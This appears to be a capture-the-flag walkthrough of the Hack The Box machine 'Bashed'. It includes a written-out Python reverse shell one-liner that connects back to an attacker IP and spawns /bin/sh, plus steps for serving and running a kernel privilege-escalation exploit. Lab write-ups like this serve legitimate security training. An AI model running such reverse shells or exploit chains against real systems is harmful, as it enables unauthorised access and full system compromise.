Contents
Bashed is a fairly straightforward box. Let’s start the walkthrough with basic enumeration!
NMAP:
nmap -sC -sV -oA bashed 10.10.10.68
-
-
- sC: Default Scripts
- sV: Service Version Detection
- oA: output all formats (HTML, XML, GNMAP)
-
Nmap Scan Results
Only port 80 is open. The next steps to take, navigate to the webpage and have dirbuster running in order to enumerate any web pages.
[hr]
Web Server:
Based Web Landing Page
Looks like they’re implementing a phpbash server and it’s safe to assume from the landing pages text that they’re running an instance of phpbash on this server. If we can find it, we will have our way in. While looking at the landing page, we also had Dirb running in the background with the default Dirb folder/file list (/usr/share/dirb/wordlists/common.txt).
Dirb Findings
Alright, there’s a /dev/ page and when we navigate to it, we find the phpbash instance link at http://10.10.10.68/dev/phpbash.php.
[hr]
PHP Bash Instance:
First, we enumerate the basics we have access to. We’re just checking for low hanging fruit right off the bat. We find we are www-data, makes sense since it was web-based implementation. We look at the /etc/passwd, /etc/shadow permissions, check for cron jobs, and enumerate any users.
PHP Bash Instance
[hr]
Reverse Shell:
We’ve got some basic information on the box but, let’s get a shell to do more in-depth digging. Since we have a literal BASH session, let’s just use one of the many different methods to pop a reverse shell. I’m going to reference the Reverse Shell Cheat Sheet by Pentestmonkey. I’ve decided to run with the Python reverse shell:
[sourcecode language=”python” wraplines=”false” collapse=”false”]
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’
[/sourcecode]
We start a Netcat listener on the Kali box and run the Python reverse shell command on the PHP Bash instance.
Reverse Shell
Let’s clean this shell up a bit and add tab autocompletion with the following commands:
[sourcecode language=”bash” wraplines=”false” collapse=”false”]
# Check the Python Version to check if Python exists
which python
# Gives us a full Pseudo-Terminal
python -c ‘import pty; pty.spawn("/bin/bash");’
[/sourcecode]
We have a pseudo terminal but, no auto-completion. In order to get auto-completion, we need to put in a bit more work. Below is the simple processes to get shell auto-completion.
[sourcecode language=”bash” wraplines=”false” collapse=”false”]
# Background the current shell with ctrl-z
stty raw -echo
fg
[/sourcecode]
[hr]
Post-Exploitation Enumeration:
We’ve already looked at the passwd and shadow permissions, enumerated cron jobs, and finally found all users by looking at the home directory. Another thing we should always do, check for sudo permissions (sudo -l). In this case though, I know that user scriptmanager has sudo rights but, it’s not the path of least resistance.
In out enumeration, we should always check for out of date kernels by running uname -r or uname -a. in our case, we’re working with:
[box style=”rounded” border=”full”]Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux[/box]
[hr]
Privilege Escalation:
Googleing “Linux 4.4.0 exploits” brings up the following results:
Looking at the first like, it’s a DCCP exploit. DCCP is a Datagram Congestion Control Protocol (UDP). It’s an obscure and vulnerable protocol that we can take advantage of by essentially crashing the kernel and escalating our privileges to root.
First, get the raw code from ExploitDB and compiling it on your kali machine (gcc <program.c> -o pwn).
Second, start an HTTP server in order to download the binary to Bashed.
[sourcecode language=”python” wraplines=”false” collapse=”false”]
python -m SimpleHTTPServer 1234
[/sourcecode]
Third, wget the binary, change permissions, and execute.
